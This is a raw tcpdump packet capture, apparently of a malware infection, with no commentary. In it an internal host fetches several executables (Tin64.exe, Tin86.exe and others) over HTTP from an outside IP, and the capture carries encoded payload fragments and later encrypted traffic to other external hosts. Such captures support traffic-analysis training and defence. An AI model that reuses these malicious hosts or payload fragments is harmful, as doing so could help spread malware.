..belles fogginess’s1.0…U….introversion’s cashier1.0…U….indecisively.org0..0.. .H…………0……..Q…X.)t5X…..5..}}..7..5……..[……#…5.....H...$..|Z4.....QB}S.......u.pJh.../6h.......IC....o.H.3.{............/b........S0Q0...U......|{..q..nb......f.AP.0...U.#..0...|{..q..nb......f.AP.0...U.......0....0.. *.H.............3.A....7Z;.E.V....A..m..B.d..H......j..N[.P?..aQ....N...k..D..............v4.fk.L. kwr.:.U..[@.j...{~f..+Hg.........."n…………….

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
E..v.:@…..
..ek.Z..J.P…/e..&P….i..GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
E..(.V….^.k.Z.
..e.P.Je..&…}P…….
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
E..,.W….^.k.Z.
..e.P.Kb{z.R..<`….^…… 2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.;@…..
..ek.Z..K.PR.. 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
E..q.<@…..
..ek.Z..K.PR..<b{z.P…=!..GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
E..(.X….^.k.Z.
..e.P.Kb{z.R…P…….
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
E..,.Y….^.k.Z.
..e.P.L2..L….`…d%……
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.=@…..
..ek.Z..L.P….2..MP…{…
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
E..o.>@…..
..ek.Z..L.P….2..MP…….GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
E..(.Z….^.k.Z.
..e.P.L2..M…DP…{…
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
E..,.[….^.k.Z.
..e.P.My./..|..`………..
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
E..(.?@…..
..ek.Z..M.P.|..y./.P…….
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
E..q.@@…..
..ek.Z..M.P.|..y./.P…….GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P….-…………………@……. ……………CWindowDock Demo – Child 2..CWindowDock Demo – Child 1..CWindowDock Demo – Parent…Fa7b$~m?aEdng?hWoWA$Q0?1#7~fcD9h5k.1M@ijUEYlfckR2…..E+rb48gCbj9hFjI5j/ZqV2/cscyHMj8xmXmyuXHP9+PNwpxEYTfYSyGizOgAmOWp14BVb1f7S6XAi7rtvKaOuUY5aI+zUCKWvieY9aPXqkdkbt2rw/v33gTw2v/XjSE3ftxh+dcJvG+nza/fzyZ+bYUFwrNj7nrc3KG/3yZRMIVE/W4Y7yaYsqbdpWlGYY2ZLeJetiSh76GPv2pXb+3aHzVHtnSTvLCOEkY5aI9KWIFdvif89aPXA0dkbt3l4y3B3gT02v7XYiE3ftwob0tvvG+Tza/fJiZ+bYUMIAqr7nqg3KG/dCZRMIUtnRlO7yaAsqbdDGlGYY1ZQVJxtK7OlIZ/PWhXBUfK3Nx111sjZ4GxCQC07WXVlLkLNzLbqQXzY0Vk4+K7lKiQPUF0rudVKa5y6gxjFMa/vmdjxaUHpaH6kcCeQmRvZ7QpawVTQuU5MA8xI747pgtAOGg1JdwGdV1irTvVwLcvYOWXVWgBkIDC4F0DwFkgNn5mNRPGu7DqZMIqNmIk8yjXMcjhPpjAlwc4ACkgUTA3ZnRggTOnFG+XYJbuhm6zYiV+bbLkwZiRmG+XIoOoFPDU8DC1yDd+ZjS7bNxl1R6unmKuob5iurlFZG7sYqg9Lz9BFFEwwEJzyA1SnDHRl2D24gOBsqIr+to/YUXvG4NolyQ7qDQsAc9K2dzh+6ZswKZoNSpYhgcMISINQLISaWcb37RuVCpfKySuRsNhqHGGZSakaZdAwpQThTjVZ3jgSUkCX5Yb4+Mii9oEiGLPb1s7ujvyMxPGHd3VPvbk9xd3KQc77ACEPux68NSvXxHbJNjA56b3ClroBxFrcMriw1XKndvz6Ludups+mEqEqDqPxOQlL8BEz8grtugZwe31Xn65FN+d94EY056W7xubaJeBhFHKeam7Ss2gSpZmF0hul0DClBOpyBfMgb68HKlkGmLAHbuQhBbbh29haqjSI6RrRF3JBSprRup3bq8+ebRhzmTlJy+rM85nQSRRu389qHdq7WPPeXj2GbmtcfaoKUIMMN+FGG3k10hUvxbLJdXwStuo9b0z6Ki6hCV5PRHqzutxgl7J6gJY5SMHEFSo3BEE2mgjMvS8NkJgm7IoLSmkzzTD62mO5HqZwKQaf7Rk5WyYqYWuz8AKZssKdOgRzS4OX5M0iQSieyA2tIQYp+Uiz2fgayfKINIz+NrI……..E+rb48hWbz9hxhliZ0Fu1BJbUVpWA//YqTp+Zu4BsTi4Z+8XibBvJH7u+2mDIeJn+e03k
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My..O.|..P….z..Ki+UZe1Xs7cyA2g5ibGl8pPrcMCyJ3bDKu6BbqbkVT57TKQqL4Wl7VZztzIfqDmLMaXymetwwjIndsbq7oLupuRFPntPJCovleXtVPO3MgfoOYpxpfKTa3DD8id2xurug66m5El+e0nkKi+S5e1Ts7cyAag5jbGl8prrcMSyJ3bfqu6gbibkQb57baSqL5Al7XdzNzICKDmp8SXykutw4XKndsOq7qEuJuRDvntsZKovheXtdjM3MhMoOasxJfKBK3DiMqd2xqruou4m5EL+e28kqi+SJe108zcyH6g5rTEl8pprcOQyp3bDKu6k7ibkR757aSSqL5Ul7XLzNzICqDmscSXymutw5fKndsdq7qWuJuRFvntr5KovlGXtcbM3MgXoOa+xJfKWK3Dmsqd2xurup24m5Ek+e2qkqi+S5e1wczcyBCg5rvEl8percNhyZ3bG6u6YLubkR/57VWRqL5Ql7U8z9zIP6DmQMeXyiqtwxXInds9q7oUupuRFfntIZCovl2XtUjO3MgOoOY8xpfKXq3DGMid2zeruhu6m5EK+e0skKi+VJe1Q87cyBGg5jnGl8pYrcMfyJ3bCqu6HrqbkSz5LdcKkQSlKPZ6syPx+yqcu8Yr868muZ7IEOL7I8Ceuh2o4nCXqJAnh6EBz8DOV/H7N5y7xi3zrzm5nsgM4vs+wJ66B6jia5eokCWHoQTPwM5a8fswnLvGGPOvPLmeyBbi+zXAnrpk4/LflaiQBb5x1bl6pa6yjpucu2njeL46uTS/62Hi4KoVupuRNbQtwz+oFKzYdZ+8rnuBmZwVsj2heJQT6b4ngLjoL5+6m2mhunmpkKhD4tQiwc7cN7jjcLrGlzXs7lKfyJ0kuOgqn7qbyqG6fqmQqEHi1CfBztw3uON7usaXZ+zuX5/InXe46CWfupsvobpzqZCoc+LULMHO3De44366xpc37O5Yn8idJLjoIJ+6m26hukipkKhA4tQRwc7cN7jjQbrGlzXs7mWfyJ0kuOgbn7qbxaG6TamQqK7i1BbBztzNuONEusaX8+zubp/InVm46BafupuGobpCqZCon+LUG8HO3My440+6xpdd7O5rn8idHLjoEZ+6m2ehukepkKjT4tQAwc7c7rjjUrrGl3fs7nSfyJ1auOgMn7qbBaG6XKmQqMji1AXBztypuONVusaXFOzucZ/InfO46Aefups8obpRqZCoXeLUCsHO3K6441i6xpcJ7O56n8idM7joAp+6myahulapkKgP4tQPwc7cDbjjI7rGl3Hs7gefyJ0muOh9n7qbnKG6K6mQqLvi1HTBztxDuOMmusaXYuzuAJ/Inf646HifupuKobogqZCokuLUecHO3Pe44ym6xpcA7O4Nn8idQ7joc5+6m5ShuiWpkKgv4tR+wc7c6LjjLLrGl03s7hafyJ1ouOhun7qbG6G6OqmQqHTi1GPBztwru
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
E..(.^@…..
..ek.Z..K.PR…b{.uP….Z..
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP
E………X.k.Z.
..e.P.My….|..P…F…OM3usaXlezuE5/InVC46Gmfupsnobo/qZCoouLUaMHO3Be44zq6xpcm7O4cn8idVbjoZJ+6m1uhujSpkKgk4tRtwc7c6LjjPbrGlyfs7hmfyJ0EuOhfn7qbm6G6CamQqLTi1FLBztzCuOMAusaX9OzuIp/Incm46FqfupsyoboOqZCo0OLUV8HO3AG44wu6xpdA7O4vn8idlLjoVZ+6m8ehugOpkKjd4tRcwc7cM7jjDrrGl+7s7iifyJ0ouOhQn7qb4qG6GKmQqP7i1EHBztyuuOMRusaXQOzuNZ/InTe46EufupsQobodqZCoxuLURsHO3Le44xS6xpd+7O4+n8idVbjoRp+6m/qhuhKpkKj54tRLwc7cN7jjH7rGl5Xs7jufyJ1ZuOhBn7qb2aG6F6mQqBLi1LDBztzquOPiusaXFezuxJ/InUe46LyfupuAobrsqZCotuLUtcHO3LS44+W6xpd07O7Bn8id2rjot5+6m3ihuuGpkKjm4tS6wc7cWbjj6LrGl+rs7sqfyJ0FuOiyn7qbE6G65qmQqDfi1L/Bztz3uOPzusaXsOzu15/InfG46K2fupsLobr7qZCoPuLUpMHO3De44/a6xpcW7O7Qn8idc7joqJ+6myuhuvCpkKgT4tSpwc7cNbjj+brGl6js7t2fyJ3OuOijn7qbB6G69amQqO3i1K7BztwouOP8usaXyOzu5p/InRu46J6fupviobrKqZCoC+LUk8HO3Oe448e6xpc07O7jn8idJLjomZ+6m26hus+pkKhB4tSYwc7cN7jjyrrGlzXs7uyfyJ0kuOiUn7qbbqG6xKmQqEHi1J3Bztw3uOPNusaXNezu6Z/InSS46I+fuptuobrZqZCoQeLUgsHO3De449C6xpc17O7yn8idJLjoip+6m26hut6pkKhB4tSHwc7cN7jj27rGlzXs7v+fyJ0kuOiFn7qbbqG606mQqEHi1IzBztw3uOPeusaXNezu+J/InSS46ICfuptuobqoqZCoQeLU8cHO3De446G6xpc17O6Fn8idJLjo+5+6m2+huq2pkKhB4tT2wc7cN7jjpLrGlzXs7o6fyJ0kuOj2n7qbbqG6oqmQqEHi1PvBztw3uOOvusaXNezui5/InSS46PGfuptuobqnqZCoQeLU4MHO3De447K6xpc17O6Un8idJLjo7J+6m26hurypkKhB4tTlwc7cN7jjtbrGlzXs7pGfyJ0kuOjnn7qbbqG6samQqEHi1OrBztw3uOO4usaXNezump/InSS46OKfuptuobq2qZCoQeLU78HO3De444O6xpc17O6nn8idJLjo3Z+6m26huoupkKhB4tTUwc7cU7jjhrrGl+Ds7qCfyJ2OuOjYn7qb36G6gKmQqOfi1NnBztw0uOOJusaXLezurZ/Inba46NOfupttobqFqZCo6+LU3sHO3Aa444y6xpcb7O62n

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
E…:.@…..
…........)a..t..P...F……”….[…>.:.8. .E8..[ 3…..K… 6......H..M...+.......K.>.5b.......QE...p.....aR.......q….4….R…….c.%.v.”….}…..M…6…beD.a1d……. …R………..De…MY…X.KO..TN.F...>.Ns.x..s..w..e.m..e.m. .z......{..[.4.b.).@J...?-.;} .,.6...8.m..e0.yZ.[..I{.4..?4.n,..#Sk...lv....CX.wB.,H........ ..H9ib......|bO@...._U..:.{DL-Yd..r...n<.?...$....?.....=..'.pvqD.{ .~j..0J...?q.KM..C..+C....o.}..V...O...Hc.........1....'$>....P..z...b.P..... n1.%...D.......1...c..6..."]. .J:.n.[O-.A......N...(.VD.6....vLXt..r...1.J.F1.B.u.....^......(....H.....l.=af.].c...C.9C.r.......P.1..X5.r......BB.2..?h..#..._.qZ....ou.^p.a^g...V....[9......k\[wl.!i6..7...{.A<.n.'..j...BQ..g....v..!..:A....GT.4.....W.jI .V._cM9._..\ .Ka..y..sN.*..flF..D.. \.=..,.8[oG...{gVL.... 6y.Z....N...6X..........a....#..(.......Q.s...\S..c5.._cM.^.....[..\.V..o….x.Mv.6,.r.+…….O..R…B..2&&.K%….:A..n.E .BI.H.8L..e..’….T.Z.y 2w/F..d.;.0L…?……5…).K..g)..v!.B..:?f…….L..[…;..@…)….F…N…Y.”.6>..ai@….[.,.g..&… }..$…………....i..0.8./.Zid |m[....[n........|..ay/|.:.Z~.A...Y...........!)..Y*Mo.])...N........Hs.......c..v......H2.&e....#9..6_.......4x...O I.t.:...I..b......j..8.Cxk.m.C.u...s.K......$..w..k5...._....{T....98...R...I.....4.w.).0@.......cl.Ph,.+u..>~W ..x.;3..q|e.8...qW?..d4..?..i.dw...F..W.~.K......bG......~.f.....G.R.:L.#...r.-.........lG......U.)..B......st.iE....S7.+...0~...2Z..I.W.u{.............8\.o..S7...}D.C.f[ 2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0 E..(;......b... ……..t…)g.P…zQ.. 2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0 E..(:.@….. ….F(……:ka. 4=P…vC.. 2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627 E…:.@….. …........)g..t..P....9...x....4.A.~. ...K...&....f....].......=...s.{.95....4..oE...RH..MM.R...D...\..E.TDYV0.koM.9.. ..N.........8....~.]..}(G..... ...Iyvb....@e.M....Q>eW..=m...$..S.1S^.....62...2D.s}.m..._..<..m......_..].q~..x..,N...aIE.Q.g..MZi.99./.T.c...s...F~U....:..?e...).'2T.]&.#...IL\...gv..,}..i{_....&..fGel.T.]...r.....b.W1.....W..u.....KlS".7>..”.=..!..C..;..r..F..x…)…..?8… …d..i.R..6.}u..a…….u#.w^nw.Z.c%…IOL.-…gJ……bH6).Dh%.v…’F……c.6….&.lZ….A…r..D….H/]C.r.H…../..r~9 C.g..N[l/..9......":.._.G.9r\b....!.......G&............<.. .P....of.;…..:.pB…3.~q<….(.S.:…f..x.7 H./%……p.<…h. 2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
E..(;……a... ........t...)j.P...w... 2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0 E..(;......... ........t...)j.P...w... 2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0 E..(:.@....G .....……)j..t..P…r…
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
E..(:.@…..
….F(……:ka. 4=P…vB..
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
E..(;……..F(.
…….. 4=.:kbP…{R..
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
E..U;……1... .........9Q5...P..............%....18FC78E29C1478DA645838C4DD2B2195. 2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0 E..4:.@....9 .....…..W..h………P…………..